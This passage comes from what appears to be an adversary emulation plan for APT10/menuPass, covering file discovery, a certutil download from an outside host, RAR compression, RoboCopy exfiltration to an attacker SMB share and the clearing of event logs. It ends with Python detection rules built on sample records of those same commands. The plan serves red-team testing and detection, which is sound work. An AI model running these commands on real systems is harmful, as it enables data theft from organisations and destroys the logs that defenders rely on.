- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
- https://cycraft.com/download/Smokescreen_Supply_Chain_Attack_Targets_Taiwan_Financial_Sector_A_Deeper_Look.pdf
## Step 9 - Data Collection & Exfiltration

### 🎤 Voice Track

menuPass uses SodaMaster to first download a modified `WMIexec.vbs` to `C:\Users\kmimi\appdata\local\temp\w.vbs` on the bastion workstation `kimeramon (10.20.20.11)`. Then, menuPass executes `w.vbs` with the cracked plaintext password of the file server administrator `kmimi` to connect to the file server `alphamon (10.20.10.23)`.

menuPass uses the reverse shell on the file server `alphamon (10.20.10.23)` to execute several PowerShell commands to enumerate and identify files of interest. menuPass then uses certutil to download WinRAR.exe to the file server `alphamon (10.20.10.23)` as `C:\Program Files\conhost.exe`. Then, menuPass executes WinRAR to compress files of interest. menuPass exfiltrates the compressed files using RoboCopy to an adversary controlled SMB share.

Once exfiltration of files is complete, menuPass clears the Windows event logs on the file server and the command history.
### ☣️ Procedures

➡️ Return to the RDP session on the Kali attack host `kraken (176.59.1.18)`.

Open a terminal window and start the SMB server:

```bash
sudo mkdir /opt/menu_pass/digirevenge
sudo impacket-smbserver digirevenge /opt/menu_pass/digirevenge -smb2support
```

Using SodaMaster, download `WMIexec.vbs` to the bastion workstation `kimeramon (10.20.20.11)`:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"w.vbs", "payloadPath":"C:/Users/kmimi/appdata/local/temp/"}'
```

Initiate an RDP session to the bastion workstation `kimeramon (10.20.20.11)` using the file server administrator `kmimi` credentials to authenticate.

Using the RDP session, open a Command Prompt then execute `WMIexec.vbs` with the file server administrator `kmimi` credentials targeting the file server `alphamon (10.20.10.23)`:

```cmd
cscript.exe C:\Users\kmimi\appdata\local\temp\w.vbs /shell 10.20.10.23 DIGIREVENGE\kmimi cHjc3p3hJHJYPUzT@
```

Using the reverse shell to the file server, execute PowerShell file discovery commands:

```cmd
powershell.exe "Get-SmbShare | foreach-object -process { if($_.Path) { dir $_.Path } }" -wait4145
```

Using the reverse shell to the file server, execute `certutil.exe` to download `WinRAR.exe` to the file server from the adversary server:

```cmd
certutil.exe -urlcache -f http://ten-cent.us/files/giag1.crl "C:\Program Files\conhost.exe"
```

Using the reverse shell to the file server, execute `WinRAR.exe` to compress each file path containing files of interest:

```cmd
cd "C:\Program Files"
conhost.exe a -r C:\Windows\Temp\wmilog.rar F:\data
```

Using the reverse shell to the file server, mount an adversary controlled SMB share then execute the `RoboCopy` utility to exfiltrate the RAR to the adversary controlled SMB share:

```cmd
net use \\manhwajia.au\digirevenge & robocopy C:\Windows\Temp \\manhwajia.au\digirevenge wmilog.rar /mt /z
```

➡️ Switch to an open terminal in Kali and confirm the exfiltration was successful:

```bash
ls -l /opt/menu_pass/digirevenge
```

➡️ Return to the RDP with the reverse shell and, using the reverse shell to the file server, execute the `wevtutil` utility to clear Windows event logs:

```cmd
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" -wait4145
```

Exit the shell:

```cmd
exit
```

Close the Command Prompt then disconnect from the RDP session.
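Process-creation detections for the native tooling this plan walks through (certutil in Step 1, remote schtasks in Step 4, ntdsutil and its Recycle Bin staging folder in Step 5, remote sc.exe in Step 6, wevtutil and robocopy in Step 9), added here as an example and not taken from the emulation plan. It assumes Windows 4688-style records with command-line auditing enabled; the rule names, regexes and sample records are constructed.

```python
"""Command-line detections for the living-off-the-land commands in this plan:
certutil downloads (Step 1), remote schtasks creation (Step 4), the ntdsutil
NTDS export and its $Recycle.Bin staging folder (Step 5), remote sc.exe service
creation (Step 6), and wevtutil log clearing plus robocopy to a UNC path
(Step 9). Input is constructed Windows event 4688 style process-creation
records; this is not part of the emulation plan."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessCreate:
    host: str
    user: str
    image: str      # 4688 NewProcessName
    cmdline: str    # 4688 CommandLine (needs command-line auditing enabled)


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    user: str
    cmdline: str


# (rule name, regex for the image file name, regex for the command line).
# Switches are matched loosely because these tools accept /x and -x in any case.
RULES = [
    ("certutil_url_download", r"certutil(\.exe)?",
     r"[-/]urlcache\b.*\bhttps?://"),
    ("schtasks_remote_create", r"schtasks(\.exe)?",
     r"/create\b.*\s/s\s+\S+"),                 # "/s <host>" but not "/sc"
    ("ntdsutil_ntds_export", r"ntdsutil(\.exe)?",
     r"\bac\s+i\s+ntds\b|\bifm\b"),
    ("recycle_bin_staging", r".*",
     r"\$recycle\.bin\\s-1-5-21-[\d-]+\\"),     # writes under a user's bin
    ("sc_remote_service_create", r"sc(\.exe)?",
     r"^\S+\s+\\\\\S+\s+create\b"),             # sc \\host create ...
    ("wevtutil_clear_log", r"wevtutil(\.exe)?",
     r"\bcl\b"),
    ("robocopy_to_unc", r"robocopy(\.exe)?",
     r"\s\\\\[^\s\\]+\\\S+"),                   # destination is \\host\share
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I))
            for name, img, cmd in RULES]


def evaluate(ev: ProcessCreate) -> list[Alert]:
    """Return every rule that matches one process-creation record."""
    base = re.split(r"[\\/]", ev.image)[-1]
    return [Alert(name, ev.host, ev.user, ev.cmdline)
            for name, img_re, cmd_re in COMPILED
            if img_re.fullmatch(base) and cmd_re.search(ev.cmdline)]


def scan(events: list[ProcessCreate]) -> list[Alert]:
    return [a for ev in events for a in evaluate(ev)]


# Constructed records modelled on the commands in this plan, followed by
# benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcessCreate("gabumon", r"DIGIRUNAWAY\kizumi", r"C:\Windows\System32\certutil.exe",
                  r'certutil.exe -urlcache -f http://ten-cent.us/files/VERSION.dll "C:\Program Files\Notepad++\VERSION.dll"'),
    ProcessCreate("gabumon", r"DIGIRUNAWAY\kizumi.da", r"C:\Windows\System32\schtasks.exe",
                  r'schtasks /create /s 10.10.10.4 /u DIGIRUNAWAY\kizumi.da /tn "Notepad++ Script" /sc MINUTE /mo 15'),
    ProcessCreate("parrotmon", r"DIGIRUNAWAY\kizumi.da", r"C:\Windows\System32\ntdsutil.exe",
                  r'ntdsutil.exe "ac i ntds" "i" "c f C:\$Recycle.Bin\S-1-5-21-156812349-472333277-3174882868-1109\$RCXNYCG" q q'),
    ProcessCreate("parrotmon", r"DIGIRUNAWAY\kizumi.da", r"C:\Windows\System32\sc.exe",
                  r'sc.exe \\kimeramon.digirevenge.net create Notepad binpath= "cmd /c notepad++.exe" start= demand'),
    ProcessCreate("alphamon", r"DIGIREVENGE\kmimi", r"C:\Windows\System32\wevtutil.exe",
                  r'wevtutil.exe cl "Security"'),
    ProcessCreate("alphamon", r"DIGIREVENGE\kmimi", r"C:\Windows\System32\Robocopy.exe",
                  r'robocopy C:\Windows\Temp \\manhwajia.au\digirevenge wmilog.rar /mt /z'),
    ProcessCreate("gabumon", r"DIGIRUNAWAY\kizumi", r"C:\Windows\System32\certutil.exe",
                  r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"),
    ProcessCreate("gabumon", r"DIGIRUNAWAY\kizumi", r"C:\Windows\System32\schtasks.exe",
                  r'schtasks /create /tn "Backup" /tr backup.cmd /sc DAILY'),
    ProcessCreate("alphamon", r"DIGIREVENGE\kmimi", r"C:\Windows\System32\wevtutil.exe",
                  r"wevtutil.exe el"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host} {a.user}: {a.cmdline}")
```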
### 🔍 Reference Code & Reporting

- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf